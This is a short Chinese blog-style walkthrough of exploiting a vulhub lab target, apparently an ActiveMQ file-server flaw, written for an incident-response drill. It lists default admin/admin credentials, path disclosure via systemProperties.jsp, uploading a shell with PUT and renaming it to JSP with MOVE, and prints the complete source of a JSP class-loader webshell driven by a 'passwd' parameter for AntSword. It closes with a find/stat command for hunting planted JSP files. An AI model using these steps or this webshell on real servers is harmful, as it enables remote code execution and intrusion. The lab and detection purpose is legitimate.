最近要做应急演练,用到了这个漏洞,就顺便记录一下这个靶场的流程
环境就不记录了,用的是vulhub的靶场
参考链接:https://www.bilibili.com/read/cv12103854/
https://blog.csdn.net/weixin_44047654/article/details/128033455
ps:关于该漏洞的成因,我对代码审计不是很懂,这里就不记录了,有兴趣的可以看看参考链接里的分析。
0x01
账户密码是:admin/admin
0x02
登陆后台访问/admin/test/systemProperties.jsp拿绝对路径
0x03 通过put的方式传入文本形式的shell,显示204即为上传成功
访问可以看到上传成功
0x04 利用MOVE方法将上传的wbsh©移动到可以执行的目录并更改后缀为jsp。
进行利用尝试,执行命令
0x05 传入一句话木马,蚁剑链接,同上述方法一致(当时执行的时候忘截图了)
文本:(找不到参考的链接了)
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
public byte[] base64Decode(String str) throws Exception {
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
%>
<%
String cls = request.getParameter("passwd");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>
上传成功:
连接蚁剑:
0x06 排查
命令:find -name "*.jsp" -exec stat -c "%n %y" {} \;
